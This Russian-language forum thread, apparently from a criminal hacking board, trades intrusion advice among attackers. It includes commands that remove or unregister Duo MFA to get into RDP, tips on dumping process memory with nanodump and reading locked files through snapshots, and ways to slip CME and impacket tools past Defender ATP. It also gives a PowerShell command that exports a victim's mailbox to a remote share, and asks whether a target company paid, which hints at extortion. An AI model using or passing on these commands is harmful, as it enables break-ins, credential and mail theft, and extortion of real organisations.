• XSS.stack #1 – первый литературный журнал от юзеров форума

[net-hacking] Вопросы по сетям

Перейти к новому Отслеживать
dioozit сказал(а):
Здравствуйте,подскажите пожалуйста как обойти DUO mfa rdp
по смб подрубись, если есть админ. и просто удали дуо.
REG QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /v UninstallString
msiexec.exe /x {тут UninstallString}

либо рубани временно
regsvr32 /u "C:\Program Files\Duo Security\WindowsLogon\DuoCredProv.dll"
regsvr32 /u "C:\Program Files\Duo Security\WindowsLogon\DuoCredFilter.dll"
 
1)как разблокировать и скопировать файл защищенный процессом не убивая сам процесс?
2)как забрать с сервера единичный файл весом терабайт?
 
Focus17 сказал(а):
1)как разблокировать и скопировать файл защищенный процессом не убивая сам процесс?
2)как забрать с сервера единичный файл весом терабайт?
1. дамп процесса делать через клонирование, типа того же нанодампа если бинарь не будет блокирован ав. у нанодампа есть куча вариантов/видов дампа.
2. ну только в облако закидывать.
 
GribnoiKot сказал(а):
1. дамп процесса делать через клонирование, типа того же нанодампа если бинарь не будет блокирован ав. у нанодампа есть куча вариантов/видов дампа.
2. ну только в облако закидывать.
Шадоукопи вроде надо чтобы был включен изначально, или ошибаюсь?!
 
kamzzzzz сказал(а):
Шадоукопи вроде надо чтобы был включен изначально, или ошибаюсь?!
пофигу. через форк (или снапшот) норм работает.
 
CCod сказал(а):
какие экзеки лучше использовать?
Встроенные?Никакие насколько я помню, нужно переписывать
Благо там простые детекты и триал легко получить
 
Последнее редактирование:
CCod сказал(а):
Насколько сильно дефендер АТП палит цме и импакет? какие экзеки лучше использовать?
Всмысле палит дефенедер, смотря что ты им делаешь. Я лично проверял (RDP) что в основном палятся попытки юзать ПС, снимал дампы, нтдс и т.д. и не примпомню, чтобы деф ругался, сомневаюсь что на ATP (win 11?) что-то сильно изменилось, тем более что ты используешь виндовые методики работы, если речь про смб управление
 
kamzzzzz сказал(а):
Всмысле палит дефенедер, смотря что ты им делаешь. Я лично проверял (RDP) что в основном палятся попытки юзать ПС, снимал дампы, нтдс и т.д. и не примпомню, чтобы деф ругался, сомневаюсь что на ATP (win 11?) что-то сильно изменилось, тем более что ты используешь виндовые методики работы, если речь про смб управление
я про что-то типа этого говорил https://redcanary.com/threat-detection-report/threats/impacket/ . Там на некоторые экзеки сразу летят дететкты
 
CCod сказал(а):
я про что-то типа этого говорил https://redcanary.com/threat-detection-report/threats/impacket/ . Там на некоторые экзеки сразу летят дететкты
Не могу сказать конкретно по импакету, я крайне редко им пользуюсь, сме в основном и еще есть https://github.com/XiaoliChan/wmiexec-Pro для "тяжелых" случаев)) хотя оба используют импакетовскую основу, но проблем нет
 
dioozit сказал(а):
Подскажите пожалуйста,очень срочно какую инфу тянуть в Exchange server и тянут ли вообще ?
Сделать дамп почты

New-MailboxExportRequest -Mailbox scox -ContentFilter "(Received -lt '10.12.2023') -and (Received -gt '01.01.2020')" -FilePath "10.10.5.5c$programdatascox.pst"
 
Пожалуйста, обратите внимание, что пользователь заблокирован
подскажите еще нюанс с таким не сталкивался
через vsphere есик не могу ввести в домен,пишет errors in active directory operations
 
В локалке Форти иногда попадаются VMware ESXi 6.7.0 например. Домена и других хостов нет
Креды не подходят.
CVE-2021-21972, CVE-2021-22005 и CVE-2017-0143 не срабатыввают. Какие еще есть способы получить доступ?
 
1) Можно ли, как либо, узнать о том что компания делала выплату или нет? работая на пример с кем либо, по мимо того что спросить у партнера и зная что за компания, доступ к впн и т.д.
2) как быстро пробить сеть на диапазоны, название сети к которой впн привязан и подобная быстрая вводная информация не через zoomeye
3) какие сканы сети есть помимо мячика
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх